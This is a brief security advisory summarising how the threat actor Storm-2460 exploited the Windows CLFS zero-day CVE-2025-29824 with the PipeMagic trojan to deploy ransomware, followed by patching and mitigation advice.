Who: A threat actor tracked as Storm-2460 exploited a Windows zero-day (CVE-2025-29824) using the PipeMagic trojan to deploy ransomware. Victims include IT, real estate, financial, software, and retail sectors across the U.S., Venezuela, Spain, and Saudi Arabia.
What:Â The vulnerability, a privilege escalation flaw in Windows Common Log File System (CLFS), was used to gain SYSTEM privileges. Attackers delivered encrypted ransomware payloads via a malicious MSBuild file and certutil, leveraging compromised third-party sites.
Impact:Â Systems were compromised to steal credentials (via LSASS dump) and encrypt files with ransomware linked to the RansomEXXÂ family. Windows 11 version 24H2 is not affected. Microsoft has patched the flaw and urges immediate updates.
Action Needed:
Apply April 2025 Patch Tuesday updates.
Monitor for PipeMagic and related activity.
Restrict certutil use and implement credential protection strategies.
Read the full article HERE